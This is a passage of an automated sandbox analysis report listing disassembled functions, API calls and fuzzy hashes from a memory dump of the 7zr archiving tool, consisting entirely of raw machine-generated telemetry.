                            • Opcode Fuzzy Hash: aba103a79465eb5672b73ed8929adf4ce324c91841cd7528e08f09534b391ff2
                            • Instruction Fuzzy Hash: 24514B74A00706DFCB24CF64C4809AAFBF2FF89340B108A6DD5529BB91D335A946CF90
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: aed60fb1d42b2eddc2b7be2e5714d2c1dbfbdabb9c826793eca4c62b8b131ff8
                            • Instruction ID: bcbad425555728f034469c89f4fdb067f133d571c260c8bce6b64a41a057aca3
                            • Opcode Fuzzy Hash: aed60fb1d42b2eddc2b7be2e5714d2c1dbfbdabb9c826793eca4c62b8b131ff8
                            • Instruction Fuzzy Hash: F541A070A01B46EFDB25CF68C485BAABBA0BF44310F148A6DD496876D1D374EDC5CB41
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E4255
                              • Part of subcall function 006E440B: __EH_prolog.LIBCMT ref: 006E4410
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 3744649731-0
                            • Opcode ID: 71eca86c77f16cad7cadbd36081c69e3135b3d60fc5e8bc74f9625dda594d083
                            • Instruction ID: 6637516e665768fc531d06e527165b47a0668b4f238d67fcc743bb21b2a08671
                            • Opcode Fuzzy Hash: 71eca86c77f16cad7cadbd36081c69e3135b3d60fc5e8bc74f9625dda594d083
                            • Instruction Fuzzy Hash: 4C51F9B0802784CFC725DF6AC18468AFBF0BF19344F5489AEC49E97752D7B4AA08CB51
                            APIs
                            • __EH_prolog.LIBCMT ref: 006FD0E6
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrowmalloc
                            • String ID:
                            • API String ID: 3978722251-0
                            • Opcode ID: 37d342a7d408d02958b59470c861b2e59db7fb3cf4256a4d6fd7f2d0226e8e45
                            • Instruction ID: a9ab074d1be761e3c8cc8093f7f3df5a6c287bf5f9bcc124a5b89f59f420d5e7
                            • Opcode Fuzzy Hash: 37d342a7d408d02958b59470c861b2e59db7fb3cf4256a4d6fd7f2d0226e8e45
                            • Instruction Fuzzy Hash: 2F41B171A00219DFCB10DBA8C9447BEBBB6BF45314F2445AAE546E7382CB70AD05CB91
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E7FCA
                              • Part of subcall function 006D950D: SysAllocStringLen.OLEAUT32(?,?), ref: 006D952C
                              • Part of subcall function 006D950D: _CxxThrowException.MSVCRT(?,007855B8), ref: 006D954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionH_prologStringThrow
                            • String ID:
                            • API String ID: 1940201546-0
                            • Opcode ID: 8ad6eb0fbf84f58efa3115664c518953a93024ece71ce4ef764bea242d8b5192
                            • Instruction ID: 1286ab98c01c1ee517823aadb992cdbf02a578701bafbd0091a6e1b4b2ce9375
                            • Opcode Fuzzy Hash: 8ad6eb0fbf84f58efa3115664c518953a93024ece71ce4ef764bea242d8b5192
                            • Instruction Fuzzy Hash: 0F31A072C21289DEDF15AFA6C8519FE7772FF14300F40406EE01AA7362EE359A09C765
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070ADBC
                              • Part of subcall function 0070AD29: __EH_prolog.LIBCMT ref: 0070AD2E
                              • Part of subcall function 0070AF2D: __EH_prolog.LIBCMT ref: 0070AF32
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: ebf2d58f747a85e5f6e2d70f65a5d7076aaa1a2340e65ac18ee8cc46a750372e
                            • Instruction ID: 33c51bc3f43cfe52ff5666404dd405a64620728371489b5be54ea886732a2dd5
                            • Opcode Fuzzy Hash: ebf2d58f747a85e5f6e2d70f65a5d7076aaa1a2340e65ac18ee8cc46a750372e
                            • Instruction Fuzzy Hash: C141D87144ABC0DEC326DB78C1656C6FFE06F35200F94899EC0EA43752D674A60CC76A
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: c873bf82689579821f0556a091165a2d2ff59a5830666e43327bedd206c51805
                            • Instruction ID: 272957e849f25d04ba064256473a870de390d62a17bea4f3f4e0282769a09683
                            • Opcode Fuzzy Hash: c873bf82689579821f0556a091165a2d2ff59a5830666e43327bedd206c51805
                            • Instruction Fuzzy Hash: 203118B0900209DBDB14EF94C8918FEBBB6FF85360B20811DE62AA7242C7309D01CBA0
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F98F7
                              • Part of subcall function 006F9987: __EH_prolog.LIBCMT ref: 006F998C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: bcd2a1bf6e2555886787a5496edf3b8b9e9b1f6d5b618b71139e6fd92e45ce8d
                            • Instruction ID: cbcea6fec35859beecb438cf14c983dcd554ed4e5a4bb7338230365038469893
                            • Opcode Fuzzy Hash: bcd2a1bf6e2555886787a5496edf3b8b9e9b1f6d5b618b71139e6fd92e45ce8d
                            • Instruction Fuzzy Hash: 69117F756002099FCB14CF59C884BAAB3AAFF89350F18851CE956D7351CB71E800CB60
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F021F
                              • Part of subcall function 006E3D66: __EH_prolog.LIBCMT ref: 006E3D6B
                              • Part of subcall function 006E3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D7D
                              • Part of subcall function 006E3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D94
                              • Part of subcall function 006E3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 006E3DB6
                              • Part of subcall function 006E3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DCB
                              • Part of subcall function 006E3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DD5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F1C74
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E7E5F
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                              • Part of subcall function 006D757D: GetLastError.KERNEL32(006DD14C), ref: 006D757D
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071BF91
                              • Part of subcall function 0071D144: __EH_prolog.LIBCMT ref: 0071D149
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            APIs
                            • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,006D1AD1,00000000,00000002,00000002,?,006D7B3E,?,00000000), ref: 006D7AFD
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070C0B8
                              • Part of subcall function 006F7193: __EH_prolog.LIBCMT ref: 006F7198
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            APIs
                            • __EH_prolog.LIBCMT ref: 00710364
                              • Part of subcall function 007101C4: __EH_prolog.LIBCMT ref: 007101C9
                              • Part of subcall function 00710143: __EH_prolog.LIBCMT ref: 00710148
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                              • Part of subcall function 007103D8: __EH_prolog.LIBCMT ref: 007103DD
                              • Part of subcall function 0071004A: __EH_prolog.LIBCMT ref: 0071004F
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071550A
                              • Part of subcall function 00714E8A: __EH_prolog.LIBCMT ref: 00714E8F
                            APIs
                            • __EH_prolog.LIBCMT ref: 00715E30
                              • Part of subcall function 007108B6: __aulldiv.LIBCMT ref: 0071093F
                              • Part of subcall function 006EDFC9: __EH_prolog.LIBCMT ref: 006EDFCE
                            APIs
                            • __EH_prolog.LIBCMT ref: 00718ED6
                              • Part of subcall function 00719267: __EH_prolog.LIBCMT ref: 0071926C
                            APIs
                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 006D7C8B
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071BE6E
                              • Part of subcall function 00715E2B: __EH_prolog.LIBCMT ref: 00715E30
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070F74A
                              • Part of subcall function 0070F784: __EH_prolog.LIBCMT ref: 0070F789
                            APIs
                            • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,006D785F,00000000,00004000,00000000,00000002,?,?,?), ref: 006D7B65
                            APIs
                            • __EH_prolog.LIBCMT ref: 007280AF
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                              • Part of subcall function 0071BDB5: __EH_prolog.LIBCMT ref: 0071BDBA
                            APIs
                            • FindClose.KERNELBASE(00000000,?,006D6880), ref: 006D6853
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseFind
                            • String ID:
                            • API String ID: 1863332320-0
                            • Opcode ID: 6c9293d8a552d7f5d532fd26d8ee0ac4c093acf2468117c9b788c6c4f38d6984
                            • Instruction ID: b01fe20162b3e16cc265fda4a193d2bbae991b98ce31d723d535e9b752e97575
                            • Opcode Fuzzy Hash: 6c9293d8a552d7f5d532fd26d8ee0ac4c093acf2468117c9b788c6c4f38d6984
                            • Instruction Fuzzy Hash: D9D01231514221468A645E7DB8449C533D96F06374321475AF0B4C73E1E7608CC366A0
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID:
                            • API String ID: 1795875747-0
                            • Opcode ID: 3d3d1d8794368c5f043bbacbef961a990c96d4844760cfffa849f0312137a4c8
                            • Instruction ID: 8dd360bdd36ea797443af5adb17060045cfb47e950f345bf9ce6f6bbab5c56dc
                            • Opcode Fuzzy Hash: 3d3d1d8794368c5f043bbacbef961a990c96d4844760cfffa849f0312137a4c8
                            • Instruction Fuzzy Hash: 35D0C7360082519F96555F15EC05C87BBA5FFD5361711082FF440511705B625855DA64
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputc
                            • String ID:
                            • API String ID: 1992160199-0
                            • Opcode ID: f125713b9c6fb02057fd8aabb54b164e7e8463fdd30d8ca54fabf94559cc4efe
                            • Instruction ID: d660a0c834a8351e6166e50949cea6dfe73b24be4a98770ee72527da5f34b11c
                            • Opcode Fuzzy Hash: f125713b9c6fb02057fd8aabb54b164e7e8463fdd30d8ca54fabf94559cc4efe
                            • Instruction Fuzzy Hash: 31B092323082209BE6191A9CBC0AAC06794DB0D772B21006FF548C21909A911C814B99
                            APIs
                            • SetFileTime.KERNELBASE(?,?,?,?,006D7C65,00000000,00000000,?,006DF238,?,?,?,?), ref: 006D7C49
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: FileTime
                            • String ID:
                            • API String ID: 1425588814-0
                            • Opcode ID: 122ec5f7e951707297385df789c923a1c4c7eff13487642c98262eefcaabb0ad
                            • Instruction ID: 68820ea5c464122eefb9a9048b3930805ff2b6450e33244fa6db7d9df7c22c99
                            • Opcode Fuzzy Hash: 122ec5f7e951707297385df789c923a1c4c7eff13487642c98262eefcaabb0ad
                            • Instruction Fuzzy Hash: E7C04C36158105FF8F020F70CC04C1ABBA2ABA9711F10C92CF159C4070C7328064EB02
                            APIs
                            • SetEndOfFile.KERNELBASE(?,006D7D81,?,?,?), ref: 006D7D3E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: File
                            • String ID:
                            • API String ID: 749574446-0
                            • Opcode ID: a06d4a019e119487b7040a1b8c66af6eb0cfc384238820599ad538e50a4b3834
                            • Instruction ID: e43005c7c019e3046b0769c1fa8548d27cb4bdf08f28189e17daf516034c1450
                            • Opcode Fuzzy Hash: a06d4a019e119487b7040a1b8c66af6eb0cfc384238820599ad538e50a4b3834
                            • Instruction Fuzzy Hash: 5BA002B02E511F8F8F121F34DC0A8243BA1BB577477A067B8B007CA4F5DF264859AA05
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID:
                            • API String ID: 2162964266-0
                            • Opcode ID: a428fd1099b025323583d87b1f6e1d54cfed1f3c3393297d730ff4581c4cbeb8
                            • Instruction ID: d1538e0491882b07230d49f4a553aa06661556b2595a2e66c02025217c2ec57f
                            • Opcode Fuzzy Hash: a428fd1099b025323583d87b1f6e1d54cfed1f3c3393297d730ff4581c4cbeb8
                            • Instruction Fuzzy Hash: 4B813C71E0424E9FCF24CFA9C484AEDBBB2AF48324F14856AE511A7341D771EA85CF54
                            APIs
                            • CloseHandle.KERNELBASE(00000000,00000000,006E3D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3E12
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: d8348bcbc50d269e8b9e4942fabdcd91ba648eafe718efe6c91a5e87f0965004
                            • Instruction ID: 8e89716736a0516082d7e63d1ff947d61b2c016ba14c81be4b245fb9906d571e
                            • Opcode Fuzzy Hash: d8348bcbc50d269e8b9e4942fabdcd91ba648eafe718efe6c91a5e87f0965004
                            • Instruction Fuzzy Hash: 4DD0127151532287DB705F2DF8087D163DE6F14361B15445EF880CB340E764CCC25A54
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                            • Instruction ID: fa23675d5940ad2d0f81b49ee8ded5e4376ba91fe8e8ea75378dba08ac736fc1
                            • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                            • Instruction Fuzzy Hash: 06D0C9E162360646EF484A30485AAAA21942B5031BBB885B8EC13CB296FB5DD61D9258
                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,006D75AF,00000002,?,00000000,00000000), ref: 006D7657
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 6351bc0989cd4a1fe2509f4c9f6df3cfd6520179e67bb7f39631541a6e56b783
                            • Instruction ID: 039ba60a4e07bb0b2b5546333aea319aa074361a4adae4881fbcd964e08c5cc4
                            • Opcode Fuzzy Hash: 6351bc0989cd4a1fe2509f4c9f6df3cfd6520179e67bb7f39631541a6e56b783
                            • Instruction Fuzzy Hash: 58D01231508662469A641E3C78459C633D95B16374371079AF0B4C33E1F360CCC34694
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000), ref: 00756B31
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 350f0c9ca84e6d77d65709461987d75595753e6cf9f7d0ede4b626c353bee121
                            • Instruction ID: 2fa474bab8eefe27638bb3be1a60f13062ac1bb15b6c704dee308e0cfd281e76
                            • Opcode Fuzzy Hash: 350f0c9ca84e6d77d65709461987d75595753e6cf9f7d0ede4b626c353bee121
                            • Instruction Fuzzy Hash: DAC08CE1A4D280DFDF0213109C40B603B208B87300F0A00C5E5085B092C2081808C762
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                            • Instruction ID: d8bbdbddd279d83e6fc697c0eed8fa677709b8be6dbcab2cb29292c4b8080781
                            • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                            • Instruction Fuzzy Hash: D3A012C961204001DE5C11303819457100012502077C414BCBD02C1105F71DE1081045
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                            • Instruction ID: 16d16cb56bd693a296d3810f64963c7d015718f685632363d55c7e6275dc67dd
                            • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                            • Instruction Fuzzy Hash: 1FA012CCF01000019E0510343815453201222E06067D8C474AC0141109FB5CD0082002
                            APIs
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00756BAC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
